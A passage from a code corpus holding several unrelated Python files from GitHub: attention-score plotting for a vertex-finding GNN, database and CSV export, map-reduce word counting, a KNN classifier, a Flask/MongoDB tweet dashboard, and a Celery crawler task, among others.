nnfeatures_hits\n if 'features_corr' in sample_graph.ndata.keys():\n nnfeatures_corr = sample_graph.ndata['features_corr'].size()[1]\n incl_corr = True\n nnfeatures += nnfeatures_corr\n \n #find how many attention layers the network has\n nattn = 0\n for key in sample_graph.edata.keys():\n if 'attn' in key:\n nattn += 1\n\n #find how many heads each attention layer has\n nheads = []\n for i in range(nattn):\n nheads.append(sample_graph.edata['attn'+str(i+1)].shape[1])\n\n profile_attn_true = []\n profile_attn_pred = []\n hist_attn_b = []\n hist_attn_c = []\n hist_attn_none = []\n profile_attn_pt_b = []\n profile_attn_pt_c = []\n profile_attn_pt_none = []\n profile_attn_d0_b = []\n profile_attn_d0_c = []\n profile_attn_d0_none = []\n profile_attn_z0_b = []\n profile_attn_z0_c = []\n profile_attn_z0_none = []\n\n for i in range(nattn):\n for j in range(nheads[i]):\n profile_attn_true.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_true\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Average edge score\", 20, 0, 1))\n profile_attn_pred.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pred\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Average edge score\", 20, 0, 1))\n hist_attn_b.append(TH1D(\"edg_attn\"+str(i+1)+str(j+1)+\"_b\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Normalized count\", 20, 0, 1))\n hist_attn_c.append(TH1D(\"edg_attn\"+str(i+1)+str(j+1)+\"_c\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Normalized count\", 20, 0, 1))\n hist_attn_none.append(TH1D(\"edg_attn\"+str(i+1)+str(j+1)+\"_none\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Normalized count\", 20, 0, 1))\n profile_attn_pt_b.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pt_b\", \";#Sigma pT;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, track_pt_bound[0]*2, track_pt_bound[1]*2))\n profile_attn_pt_c.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pt_c\", \";#Sigma pT;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, track_pt_bound[0]*2, track_pt_bound[1]*2))\n profile_attn_pt_none.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pt_none\", \";#Sigma pT;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, track_pt_bound[0]*2, track_pt_bound[1]*2))\n profile_attn_z0_b.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_z0_b\", \";#Delta z0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_z0_bound))\n profile_attn_z0_c.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_z0_c\", \";#Delta z0;Average 
#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_z0_bound))\n profile_attn_z0_none.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_z0_none\", \";#Delta z0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_z0_bound))\n profile_attn_d0_b.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_d0_b\", \";#Delta d0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_d0_bound))\n profile_attn_d0_c.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_d0_c\", \";#Delta d0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_d0_bound))\n profile_attn_d0_none.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_d0_none\", \";#Delta d0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_d0_bound))\n\n #read in length of test file\n if os.path.isfile(paramfile_name):\n paramfile = open(paramfile_name, \"r\")\n train_len = int(float(paramfile.readline()))\n val_len = int(float(paramfile.readline()))\n test_len = int(float(paramfile.readline()))\n else:\n print(\"ERROR: Specified parameter file not found\")\n return 1\n batches = int(math.ceil(test_len/batch_size))\n\n for ibatch in range(batches):\n #calculate batch indices\n istart = ibatch*batch_size\n if ibatch == (batches-1) and test_len%batch_size != 0:\n iend = istart + (test_len%batch_size)\n else:\n iend = (ibatch+1)*batch_size\n\n #load batch from file\n batch = dgl.batch(dgl.load_graphs(graphfile_name, list(range(istart, iend)))[0])\n g_list = dgl.unbatch(batch)\n\n for g in g_list:\n features = g.ndata['features_base'].numpy()\n pred = g.edata['pred'].numpy()\n bin_labels = g.edata['bin_labels'].numpy()\n mult_labels = g.edata['mult_labels'].numpy()\n srcnodes, dstnodes = g.edges()\n\n for i in range(pred.shape[0]):\n src_pt = abs(1/features[srcnodes[i],0])\n dst_pt = abs(1/features[dstnodes[i],0])\n src_z0 = features[srcnodes[i],4]\n dst_z0 = features[dstnodes[i],4]\n src_d0 = features[srcnodes[i],3]\n dst_d0 = features[dstnodes[i],3]\n\n c = 0\n for j in range(nattn):\n attn = g.edata['attn'+str(j+1)].numpy()\n for k in range(nheads[j]):\n profile_attn_true[c].Fill(attn[i,k,0], bin_labels[i])\n profile_attn_pred[c].Fill(attn[i,k,0], pred[i,0])\n\n if mult_labels[i] == 1:\n hist_attn_b[c].Fill(attn[i,k,0])\n profile_attn_pt_b[c].Fill(src_pt+dst_pt, attn[i,k,0])\n profile_attn_z0_b[c].Fill(abs(src_z0-dst_z0), attn[i,k,0])\n profile_attn_d0_b[c].Fill(abs(src_d0-dst_d0), attn[i,k,0])\n elif mult_labels[i] == 2:\n hist_attn_c[c].Fill(attn[i,k,0])\n profile_attn_pt_c[c].Fill(src_pt+dst_pt, attn[i,k,0])\n profile_attn_z0_c[c].Fill(abs(src_z0-dst_z0), attn[i,k,0])\n profile_attn_d0_c[c].Fill(abs(src_d0-dst_d0), attn[i,k,0])\n else:\n hist_attn_none[c].Fill(attn[i,k,0])\n profile_attn_pt_none[c].Fill(src_pt+dst_pt, attn[i,k,0])\n profile_attn_z0_none[c].Fill(abs(src_z0-dst_z0), attn[i,k,0])\n profile_attn_d0_none[c].Fill(abs(src_d0-dst_d0), attn[i,k,0])\n c += 1\n\n base_filename = outfile_path+runnumber+\"/\"+infile_name+\"_\"+runnumber\n\n canv1 = TCanvas(\"c1\", \"c1\", 800, 600)\n\n c = 0\n for i in range(nattn):\n for j in range(nheads[i]): \n plot_profile(canv1, [profile_attn_true[c], profile_attn_pred[c]], ['true', 'pred'], cut_string, base_filename+\"_attn\"+str(i)+str(j)+\"_tp.png\")\n plot_hist(canv1, [hist_attn_b[c], hist_attn_c[c], hist_attn_none[c]], ['b', 'c', 'none'], cut_string, True, False, base_filename+\"_attn\"+str(i)+str(j)+\"_bc.png\")\n plot_profile(canv1, [profile_attn_pt_b[c], profile_attn_pt_c[c], profile_attn_pt_none[c]], ['b', 'c', 'none'], cut_string, 
base_filename+\"_attn\"+str(i)+str(j)+\"_pt.png\")\n plot_profile(canv1, [profile_attn_z0_b[c], profile_attn_z0_c[c], profile_attn_z0_none[c]], ['b', 'c', 'none'], cut_string, base_filename+\"_attn\"+str(i)+str(j)+\"_z0.png\")\n plot_profile(canv1, [profile_attn_d0_b[c], profile_attn_d0_c[c], profile_attn_d0_none[c]], ['b', 'c', 'none'], cut_string, base_filename+\"_attn\"+str(i)+str(j)+\"_d0.png\")\n c += 1\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"jmw464/Vertex-GNN","sub_path":"scripts/visualize_attention.py","file_name":"visualize_attention.py","file_ext":"py","file_size_in_byte":10676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72348557905","text":"import psycopg2 as postgree\nfrom database_connector import DatabaseConnector\nimport os\nimport datetime\nfrom pandas import pandas as pd\n\n# Directory for save the data imported\nLOCAL_TABLES_DIRECTORY: str = os.getcwd() + \"/raw_data\"\nDATE_STRING: str = datetime.date.today().strftime(\"%Y-%m-%d\")\n\n\nclass DataDownload():\n '''Class to download the data'''\n\n @classmethod\n def download_tables(cls) -> str:\n '''Download the tables from database\n\n Args:\n None.\n\n Return:\n str: Tables save in the directory. '''\n\n try:\n QUERY_TABLE: str = \"\"\"SELECT table_name \n FROM information_schema.tables \n WHERE table_schema = 'public'\"\"\"\n\n database_connection = DatabaseConnector.connect()\n cursor = database_connection.cursor()\n\n print(\"Quering database...\")\n\n cursor.execute(QUERY_TABLE)\n\n query_result = cursor.fetchall()\n\n print(f\"Tables found {query_result}\")\n\n for table_data in query_result:\n table = table_data[0]\n select = \"\"\"SELECT * \n FROM {}\"\"\".format(table)\n database_df = pd.read_sql(select, DatabaseConnector.connection)\n database_directory = (\n f\"{LOCAL_TABLES_DIRECTORY}/postgres/{DATE_STRING}\")\n os.makedirs(database_directory, exist_ok=True)\n database_df.to_csv(\n f\"{database_directory}/{table}.csv\", index=False)\n\n print(\"Files save in the directory. \")\n finally:\n DatabaseConnector.close()\n\n return print(\"All the tables downloaded.\")\n\n @classmethod\n def download_csv(cls) -> None:\n '''Download the csv from directory\n\n Args:\n None.\n\n Return:\n None: file save in the directory. 
'''\n\n        path_csv = \"data/order_details.csv\"\n        file_name = os.path.basename(path_csv)\n        print(\"Exporting csv file.\")\n        csv_df = pd.read_csv(path_csv)\n        csv_directory = (\n            f\"{LOCAL_TABLES_DIRECTORY}/csv/{DATE_STRING}\")\n        os.makedirs(csv_directory, exist_ok=True)\n        csv_df.to_csv(f\"{csv_directory}/{file_name}\")\n        print(\"File saved in the directory.\")\n\n\nif __name__ == \"__main__\":\n    step1 = DataDownload()\n    step1.download_tables()\n    step1.download_csv()\n","repo_name":"cayod/pipeline-airflow-docker","sub_path":"airflow/dags/step1/data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15177645590","text":"from functools import reduce\nfrom multiprocessing import Pool\n\n# mapper function\ndef count_words(names):\n    count_names = {}\n    for name in names:\n        if name not in count_names:\n            count_names[name] = 0\n        count_names[name] += 1\n    #print(count_names)\n    return count_names \n\n# reduce function\n# dict1: the result accumulated so far\n# dict2: the new dictionary to merge in\ndef calculate(dict1, dict2):\n    combined = {}\n\n    #print(dict1, dict2)\n\n    for key in dict1:\n        combined[key] = dict1[key]\n\n    for key in dict2:\n        if key in combined:\n            combined[key] += dict2[key]\n        else:\n            combined[key] = dict2[key]\n\n    return combined\n\n\nif __name__ == \"__main__\":\n    list_of_names = [[\"Maria\", \"Pedro\", \"Juan\"], [\"Pedro\"], [\"Maria\"]]\n\n    with Pool() as pool:\n        results = pool.map(count_words, list_of_names) # MAP\n\n    words = reduce(calculate, results)\n\n    for key, val in words.items():\n        print(\"El total para {} es {}\".format(key, val))\n\n# python3 -m pip install multiprocess\n# sample source: https://chryswoods.com/parallel_python/mapreduce2_answer2.html","repo_name":"balbuenac/batch-map-reduce","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33655947002","text":"\nimport sqlite3\nfrom sqlite3 import Error\nimport logging\nimport datetime\nfrom contextlib import contextmanager\n\n\ntable_def_file = '''CREATE TABLE IF NOT EXISTS data (\n    id INTEGER PRIMARY KEY,\n    name text NOT NULL,\n    start_time DATETIME NOT NULL,\n    duration REAL NOT NULL,\n    comments text\n);'''\n\n\nwrite_def = '''INSERT INTO data(name,start_time,duration, comments)\n    VALUES(?,?,?,?);'''\n\nread_data = '''SELECT\n    * FROM data\n    ORDER BY start_time DESC\n    LIMIT ? 
OFFSET ?;'''\n\n\n@contextmanager\ndef LogFile(file_path):\n    conn = None\n    try:\n        conn = sqlite3.connect(file_path)\n        _create_table(conn, table_def_file)\n        print(sqlite3.version)\n        yield conn\n    except Error as e:\n        logging.critical(e)\n    finally:\n        if conn:\n            conn.close()\n\n\ndef _create_table(conn, create_table_sql):\n    \"\"\" create a table from the create_table_sql statement\n    :param conn: Connection object\n    :param create_table_sql: a CREATE TABLE statement\n    :return:\n    \"\"\"\n    try:\n        c = conn.cursor()\n        c.execute(create_table_sql)\n    except Error as e:\n        logging.critical(e)\n\n\ndef write(conn, data):\n    cur = conn.cursor()\n    cur.execute(write_def, data)\n    conn.commit()\n    return cur.lastrowid\n\n\ndef read(conn, cond):\n    cur = conn.cursor()\n    cur.execute(read_data, cond)\n    x = cur.fetchall()\n    return x\n\n\nif __name__ == '__main__':\n    with LogFile(\"pythonsqlite.db\") as f:\n        x = (datetime.datetime.now(),)\n        # data1 = (\"Station1\", datetime.datetime.now(), 56, \"aaa\")\n        # data2 = (\"Station2\", datetime.datetime.now(), 56, \"aaa\")\n        # write(f, data1)\n        # write(f, data2)\n        d = read(f, (2,3))\n        print(d)\n","repo_name":"zencrust/part-monitor-report","sub_path":"AlarmLogger/sqlliteTest.py","file_name":"sqlliteTest.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19940470826","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://www.instagram.com/'\nlinks = ['kimelya_11']\n\nresult = requests.get(url + links[0])\nsoup = BeautifulSoup(result.text, 'html.parser')\n\nscripts = soup.findAll('script', {'type': 'text/javascript'})\n\nprint(scripts[3])\n\nwith open(links[0] + \".html\", \"w\", encoding=\"utf-8\") as f:\n    f.write(result.text)\n","repo_name":"Creariax5/Wiki-Scrap","sub_path":"insta/instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74309269266","text":"from PIL import Image, ImageDraw\nimport PIL\nfrom tkinter import *\nimport numpy\n\n# New window that lets the user draw a digit with the mouse\n# DOES NOT WORK\nclass DrawNumberWindow:\n\n    def __init__(self, interface):\n        self.width = 224\n        self.height = 224\n        self.interface = interface\n        self.second_window = Tk()\n        self.cv = Canvas(self.second_window, width=self.width, height=self.height, bg='white')\n        self.cv.grid(row=0, column=0)\n\n        self.image1 = PIL.Image.new(\"L\", (self.width, self.height))\n        self.draw = ImageDraw.Draw(self.image1)\n        self.cv.bind(\"<B1-Motion>\", self.paint)  # paint while dragging with the left mouse button\n\n        button = Button(self.second_window, text=\"Guess\", command=self.guess)\n        button.grid(row=1, column=0)\n        self.second_window.mainloop()\n\n    # returns a vector of 784 values corresponding to the user's resized drawing.\n    def guess(self):\n        image = self.image1.resize((28, 28))\n        array = numpy.array(image.getdata(),\n                            numpy.uint8).reshape(image.size[1], image.size[0], 1)\n        self.interface.drawing_values = array\n        self.interface.guess_drawing()\n        self.second_window.destroy()\n\n    def paint(self, event):\n        x1, y1 = (event.x - 1), (event.y - 1)\n        x2, y2 = (event.x + 1), (event.y + 1)\n        self.cv.create_oval(x1, y1, x2, y2, fill=\"black\", width=3)\n        self.draw.line([x1, y1, x2, y2], fill=\"black\", 
width=3)\n","repo_name":"Civel-1/HandwrittenNumbers","sub_path":"DrawNumberWindow.py","file_name":"DrawNumberWindow.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35372010842","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\n\nimport lagrange_polynomial\nimport error_compare\nimport functions\n\nprint(\"Enter n: \")\nn = int(input())\n#n = 60\ns = 0.0\ne = 10.0\n\n\nx_test = np.linspace(s, e, 1000)\ny_test = functions.f(x_test)\n\nx_node = np.linspace(s, e, n)\ny_node = functions.f(x_node)\n\nx_cheb_node = lagrange_polynomial.create_cheb_nodes(s, e, n)\ny_cheb_node = functions.f(x_cheb_node)\n\nx_res = lagrange_polynomial.create_test_x(s, e, n)\ny_res = np.zeros(n - 1)\ny_cheb_res = np.zeros(n - 1)\n\nfor k in range(0, n - 1, 1):\n y_res[k] = lagrange_polynomial.calc(x_res[k], x_node, y_node, n)\n y_cheb_res[k] = lagrange_polynomial.calc(x_res[k], x_cheb_node, y_cheb_node, n)\n\n\n#print(\"x_res: \", x_res)\n#print(\"y_res: \", y_res)\n#print(\"y_cheb_res: \", y_cheb_res)\n#print(\"\\n\")\n_error = functions.error(x_res, y_res)\ncheb_error = functions.error(x_res, y_cheb_res)\n#print(\"max_error: \", _error)\n#print(\"max_cheb_error: \", cheb_error)\nplt.plot(x_test, y_test, c='green', label='function')\n#plt.scatter(x_node, y_node, c='blue', s=50, label='nodes')\n#plt.scatter(x_cheb_node, y_cheb_node, c='orange', s=50, label='cheb_nodes')\nplt.scatter(x_res, y_res, c='red', s=10, label='calc_points')\nplt.scatter(x_res, y_cheb_res, c='purple', s=10, label='calc_cheb_points')\nplt.annotate(\"n: %d\" % n, xy=(0.6, 0.15), xycoords='axes fraction')\nplt.annotate(\"max_error: %.5f\" % _error, xy=(0.6, 0.1), xycoords='axes fraction')\nplt.annotate(\"max_cheb_error: %.5f\" % cheb_error, xy=(0.6, 0.05), xycoords='axes fraction')\nplt.legend()\nplt.show()\n\n# _from = 10\n# _to = 200\n# _step = 10\n# errors, cheb_errors = error_compare.calc_errors(s, e, _from, _to, _step)\n# x_i = np.linspace(_from, _to, int((_to - _from) / _step) + 1)\n# plt.plot(x_i, errors, label='error')\n# plt.plot(x_i, cheb_errors, label='cheb_error')\n# plt.legend()\n# #plt.show()\n# # print(\"errors: \", errors)\n# # print(\"cheb_errors: \", cheb_errors)\n# with open('errors.csv', mode='w', newline='') as error_file:\n# file_writer = csv.writer(error_file, delimiter=',')\n# file_writer.writerow(['n', 'error', 'cheb_error'])\n# for i in range(_from, _to+1, _step):\n# file_writer.writerow([i, errors[int((i - _from) / _step)], cheb_errors[int((i - _from) / _step)]])\n","repo_name":"razenkovv/Num_methods_5sem","sub_path":"LR1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7474440622","text":"from typing import List\nimport couchdb\nimport parse_yaml\nimport sys\n\nsys.path.append('../../../config')\nimport config\n\nworkflow = []\ndb = couchdb.Server(config.COUCHDB_URL)\ntimedict = {}\nmxdis = 0\nans = []\n\ndef pre(request_id):\n global timedict, mxdis, ans\n timedict = {}\n mxdis = 0\n ans = []\n for _id in db['workflow_latency']:\n doc = db['workflow_latency'][_id]\n if doc['request_id'] != request_id or doc['phase'] != 'all':\n continue\n timedict[doc['function_name']] = doc['time']\n\ndef dfs(name, dis, path: List):\n global mxdis, ans\n path.append(name)\n tmpdis = dis\n if name in timedict:\n tmpdis = dis + timedict[name]\n if tmpdis > mxdis:\n mxdis 
= tmpdis\n ans = list(path)\n for name in workflow.nodes[name].prev:\n dfs(name, tmpdis, path)\n path.pop()\n\ndef analyze(workflow_name, request_id):\n global workflow, timedict\n workflow = parse_yaml.parse(workflow_name)\n pre(request_id)\n for name, _ in workflow.nodes.items():\n if name in timedict:\n dfs(name, 0, [])\n return ans\n","repo_name":"sjtu-epcc/FaaSFlow","sub_path":"test/asplos/schedule_overhead/find_critical_path.py","file_name":"find_critical_path.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"17094622987","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport json\nimport time\nimport socket\nimport logging\nfrom bson import json_util\nfrom modules.datebase import MongoDB\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask import Flask, jsonify, make_response, render_template, url_for\nfrom prometheus_flask_exporter.multiprocess import GunicornPrometheusMetrics\n\n#config log\nfile_log = os.path.basename(__file__).replace('.py', '.log')\nfmt=(\"{'time':'%(asctime)s','name':'%(name)s','level':'%(levelname)s','message':'%(message)s'}\")\nformatter = logging.Formatter(fmt)\nstream_handler = logging.StreamHandler(sys.stdout)\nstream_handler.setFormatter(formatter)\n\n#log main\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(stream_handler)\n\n#log flask_werkzeug\nlog_flask = logging.getLogger('werkzeug')\nlog_flask.addHandler(stream_handler)\n\n#log mongodb\nlog_mongodb = logging.getLogger(\"mongodb\")\nlog_mongodb.setLevel(logging.INFO)\nlog_mongodb.addHandler(stream_handler)\n\n#log path\ntry:\n path_log = os.environ[\"LOG_PATH\"]\nexcept KeyError:\n log.error(\"environment variable to config log not found!\")\n sys.exit(1)\nif os.environ[\"LOG_FILE\"] == \"true\":\n file_handler = logging.FileHandler(\"{}/{}\".format(path_log, file_log))\n file_handler.setFormatter(formatter)\n log.addHandler(file_handler)\n log_flask.addHandler(file_handler)\n log_mongodb.addHandler(file_handler)\n\n#obj mondodb\ndb = MongoDB()\n\n#instance flask app\napp = Flask(__name__)\napp.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n\n#instance auth\nauth = HTTPBasicAuth()\n\n#metrics by prometheus\nmetrics = GunicornPrometheusMetrics(app)\n\n@auth.get_password\ndef get_password(username):\n if username == 'admin':\n return 'admin'\n return None\n\n@app.route('/')\ndef follow():\n return render_template('follow.html', \n title='Tweets by Followers', \n follow=db.mongo_find_sort())\n\n@app.route('/hour')\ndef hour():\n return render_template('hour.html', \n title='Tweets by Time', \n hour=db.mongo_total_post_by_hour())\n\n@app.route('/location')\ndef location():\n return render_template('location.html', \n title='Tweets by Location', \n location=db.mongo_total_tag_by_location())\n\n@app.route('/health')\ndef probe():\n try:\n host = os.environ[\"MONGODB_HOST\"]\n port = int(os.environ[\"MONGODB_PORT\"])\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n try :\n s.connect((host, port))\n return jsonify({'database': 'up'}), 200\n except :\n return jsonify({'database': 'down'}), 500\n except KeyError:\n log.error(\"environment variable to access mongodb not found!\")\n sys.exit(1)\n except Exception as e:\n log.error(e)\n\n@auth.error_handler\ndef unauthorized():\n return make_response(jsonify( { 'error': 'Unauthorized access' } ), 403)\n\n@app.errorhandler(400)\ndef bad_request(error):\n return make_response(jsonify( { 'error': 
'Bad Request' } ), 400)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Not Found' } ), 404)\n\n@app.errorhandler(500)\ndef server_error(error):\n return make_response(jsonify( { 'error': 'Internal Server' } ), 500)\n\n@app.route('/api/v1/tweets', methods = ['GET'])\n@auth.login_required\ndef get_tweets():\n try:\n t = list()\n tweets = db.mongo_find_all()\n for tweet in tweets:\n t.append(tweet)\n return jsonify(json.loads(json_util.dumps(t)))\n except Exception as e:\n log.error(e)\n\n@app.route('/api/v1/tweets/followers', methods = ['GET'])\n@auth.login_required\ndef get_followers():\n try:\n follow = db.mongo_find_sort()\n return jsonify(json.loads(json_util.dumps(follow)))\n except Exception as e:\n log.error(e)\n\n@app.route('/api/v1/tweets/posts', methods = ['GET'])\n@auth.login_required\ndef get_posts():\n try:\n posts = db.mongo_total_post_by_hour()\n return jsonify(posts)\n except Exception as e:\n log.error(e)\n\n@app.route('/api/v1/tweets/location', methods = ['GET'])\n@auth.login_required\ndef get_location():\n try:\n location = db.mongo_total_tag_by_location()\n return jsonify(location)\n except Exception as e:\n log.error(e)\n\nif __name__ == '__main__':\n app.run(debug=True, port=8080)","repo_name":"ogithubdotiago/twitter-app","sub_path":"frontend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10696727065","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import *\nfrom .tasks import *\n\ndef update_subscription(modeladmin, request, queryset):\n for sub in queryset:\n sub.check_subscription_payments()\n return\n\n\nclass SubscriptionPaymentInline(admin.TabularInline):\n model = SubscriptionPayment\n fields = ('source_character', 'is_trial_payment','amount', 'journal_id', 'payment_time_actual', 'payment_read_time')\n #readonly_fields = ('source_character', 'journal_id', 'payment_time_actual', 'payment_read_time')\n readonly_fields = ['payment_read_time', 'payment_time_actual', 'journal_id']\n extra = 0\n\n #can_delete = False\n\n\nclass SubscriptionStatusAdmin(admin.ModelAdmin):\n model= SubscriptionStatus\n #filter_horizontal = ('item_groups',)\n list_display = ('__str__', 'active','credit_remaining','credit_consumed', 'subscription_last_updated', 'id' )\n search_fields = ['__str__']\n readonly_fields = ('user','credit_remaining','credit_consumed', 'subscription_last_updated', 'id' )\n inlines = [SubscriptionPaymentInline]\n actions = [update_subscription]\n\nadmin.site.register(SubscriptionStatus, SubscriptionStatusAdmin)\n\n","repo_name":"zanielyene/krabacus3","sub_path":"app/payments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30256228015","text":"import numpy as np\n\nclass KNN:\n def __init__(self, k):\n self.k = k\n def norm(self, X, fit):\n if fit:\n self.Xmean, self.Xstd = X.mean(), X.std() + 0.001\n \n return (X - self.Xmean )/self.Xstd\n def fit(self, X, y):\n self.X = self.norm(X, fit=True)\n self.y = y\n\n def vote(self, neighbors):\n y = self.y[neighbors]\n return np.argmax(np.bincount(y))\n\n \n def predict(self, Xtest):\n Xtest = self.norm(Xtest, fit=False)\n preds = []\n for obs in Xtest:\n dist = np.sum((self.X - obs)**2, axis=1)\n kneighbors =np.argsort(dist)[:self.k]\n 
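# majority vote among the k nearest training points decides the predicted class\n            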
preds.append(self.vote(kneighbors))\n        return preds\n    \n    \nimport pandas as pd\n\nk = KNN(5)\ndf = pd.read_csv('/Users/shravanshetty/Documents/GitHub/ml_algo_scratch/notebook/python/data/student_result_data.txt', header = None)\ndf.head()\n\nk.fit(df.loc[:, [0,1]].values, df[2].values)\n\ndf['predict'] = k.predict(df.loc[:, [0,1]].values)\nprint(df)\nprint((df[2] == df['predict']).sum()/df.shape[0])\n\n","repo_name":"shett044/ml_algo_scratch","sub_path":"notebook/python/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7931845391","text":"total_ced = 0\r\nced = 50\r\n\r\nprint('''-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n              BANCO CEV    \r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-''')\r\n\r\nvalor = int(input('Que valor você quer sacar? R$'))\r\ntotal = valor\r\nt_ced = 0\r\n\r\nwhile True:\r\n    if total >= ced:\r\n        total -= ced\r\n        t_ced += 1\r\n    else:\r\n        if t_ced > 0:\r\n            print(f'Total de {t_ced} de R${ced}.')\r\n        if ced == 50:\r\n            ced = 20\r\n        elif ced == 20:\r\n            ced = 10\r\n        elif ced == 10:\r\n            ced = 1\r\n        t_ced = 0\r\n        if total == 0:\r\n            break\r\n\r\nprint('''   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\nVolte sempre no BANCO DEV! Tenha um bom dia!\r\n   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-''')\r\n\r\n\r\n############ Without while ############\r\n\r\n\r\n\"\"\"\r\ncinquenta = vinte = dez = um = 0\r\n\r\nvalor = int(input('Que valor você quer sacar? R$'))\r\n\r\nif valor >= 50:\r\n    cinquenta = valor // 50\r\n    valor %= 50\r\n    print(f'Total de {cinquenta} cédulas de R$50')\r\nif valor >= 20:\r\n    vinte = valor // 20\r\n    valor %= 20\r\n    print(f'Total de {vinte} cédulas de R$20')\r\nif valor >= 10:\r\n    dez = valor // 10\r\n    valor %= 10\r\n    print(f'Total de {dez} cédulas de R$10')\r\nif valor >= 1:\r\n    um = valor // 1\r\n    valor %= 1\r\n    print(f'Total de {um} cédulas de R$1')\r\n\r\n\"\"\"","repo_name":"BrenoTNK/cev-python","sub_path":"aula15 - interrompendowhile/desafio071.py","file_name":"desafio071.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7744043042","text":"# This file contains the Celery crawl_task that will run asynchronously.\n\nfrom celery import Celery\nimport mysql.connector\nimport sql_helper\nimport sys\nimport json\nimport os\nfrom datetime import datetime\nimport time\nimport crawl_OAG\nimport crawl_arxiv\nimport crawl_springer\n# import crawl_gscholar\nimport pandas as pd\n\n# Redis broker URL\nBROKER_URL = 'redis://localhost:6380/0'\n\n# We are creating an instance of the Celery class by passing the module name as Publication_Crawler and the broker as Redis.\ncelery_app = Celery('Publication_Crawler', backend='rpc://', broker=BROKER_URL)\n\n# Functions decorated with @celery_app.task are considered Celery tasks.\n@celery_app.task\ndef crawl_task(crawler, professor, university):\n    print(\"Started scraping \" + crawler + \": \" + professor + \", \" + university)\n    res = None\n\n    # Call each crawler\n    if crawler == \"crawl_arxiv\":\n        res = crawl_arxiv.crawl(professor, university)\n    \n    elif crawler == \"crawl_oag\":\n        res = crawl_OAG.crawl(professor, university)\n\n    elif crawler == \"crawl_springer\":\n        res = crawl_springer.crawl(professor, university)\n\n    elif crawler == \"crawl_gscholar\":\n        \"\"\"\n        res = crawl_gscholar.crawl(professor, university)\n        \"\"\"\n    \n    if res is not None:\n        sql_helper.mysql_connect()\n        res[\"citations\"] = 
